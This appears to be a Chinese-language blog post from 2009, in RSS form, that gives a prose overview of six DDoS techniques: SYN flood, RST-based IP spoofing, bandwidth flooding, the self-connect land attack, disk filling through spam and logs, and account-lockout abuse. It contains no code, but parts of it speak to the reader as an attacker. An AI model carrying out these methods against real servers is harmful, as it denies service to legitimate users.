<font size="3">&nbsp;&nbsp;&nbsp;  了解DDOS攻击实施方法是我们掌握DDoS攻击的开始，那么另外一个方面对于DDoS攻击方法的了解更是为了确保安全的考虑，那么都有哪些DDoS攻击实施方法呢？我们来一一介绍一下：</font>
<p> </p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  1、SYN FLOOD方式进行DDOS攻击</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  利用服务器的连接缓冲区（Backlog Queue），利用特殊的程序，设置TCP的Header，向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候，都认为是没有建立起来的连接请求，于是为这些请求建立会话，排到缓冲区队列中。 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  如果你的SYN请求超过了服务器能容纳的限度，缓冲区队列满，那么服务器就不再接收新的请求了。其他合法用户的连接都被拒绝掉。可以持续你的SYN请求发送，直到缓冲区中都是你的只有SYN标记的请求。现在有很多实施SYN FLOOD的工具，呵呵，自己找去吧。 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  2、IP欺骗DDOS攻击 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  这种攻击利用RST位来实现。假设现在有一个合法用户(1.1.1.1)已经同服务器建立了正常的连接，攻击者构造攻击的TCP数据，伪装自己的IP为1.1.1.1，并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后，认为从1.1.1.1发送的连接有错误，就会清空缓冲区中建立好的连接。这时，如果合法用户1.1.1.1再发送合法数据，服务器就已经没有这样的连接了，该用户就必须从新开始建立连接。攻击时，伪造大量的IP地址，向目标发送RST数据，使服务器不对合法用户服务。</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  3、带宽DDOS攻击 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  如果你的连接带宽足够大而服务器又不是很大，你可以发送请求，来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大了，配合上SYN一起实施DDOS，威力巨大。不过是初级DOS攻击。呵呵。Ping白宫？？你发疯了啊！ </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  4、自身消耗的DDOS攻击 </font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  这是一种老式的攻击手法。说老式，是因为老式的系统有这样的自身BUG。比如Win95 (winsock v1), Cisco IOS v.10.x, 和其他过时的系统。这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同，发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快把资源消耗光。直接导致当机。这中伪装对一些身份认证系统还是威胁巨大的。</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  上面这些实施DDOS攻击的手段最主要的就是构造需要的TCP数据，充分利用TCP协议。这些攻击方法都是建立在TCP基础上的。还有其他的DDOS攻击手段。</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  5、塞满服务器硬盘方式DDOS攻击</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  通常，如果服务器可以没有限制地执行写操作，那么都能成为塞满硬盘造成DDOS攻击的途径，比如：发送垃圾邮件。一般公司的服务器可能把邮件服务器和WEB服务器都放在一起。破坏者可以发送大量的垃圾邮件，这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中，直到邮箱被撑破或者把硬盘塞满。 让日志记录满。入侵者可以构造大量的错误信息发送出来，服务器记录这些错误，可能就造成日志文件非常庞大，甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志，甚至就不能发现入侵者真正的入侵途径。向匿名FTP塞垃圾文件。这样也可以塞满硬盘空间。</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  6、合理利用策略进行DDOS攻击</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  一般服务器都有关于帐户锁定的安全策略，比如，某个帐户连续3次登陆失败，那么这个帐号将被锁定。这点也可以被破坏者利用，他们伪装一个帐号去错误登陆，这样使得这个帐号被锁定，而正常的合法用户就不能使用这个帐号去登陆系统了。</font></p>
<p><font size="3">&nbsp;&nbsp;&nbsp;  DDOS攻击方式的基本情况就向你介绍到这里，希望对你了解和掌握以及防范DDOS攻击有所帮助。</font></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/panhc007/blog/category/Hacker%20Information">Hacker Information</a>&nbsp;<a href="http://hi.baidu.com/panhc007/blog/item/90db0fafd6c569f1faed50c9.html#comment">查看评论</a>]]></description>
        <pubDate>2009-09-24  12:52</pubDate>
        <category><![CDATA[Hacker Information]]></category>
        <author><![CDATA[panhc007]]></author>
		<guid>http://hi.baidu.com/panhc007/blog/item/90db0fafd6c569f1faed50c9.html</guid>
</item>


</channel>
</rss>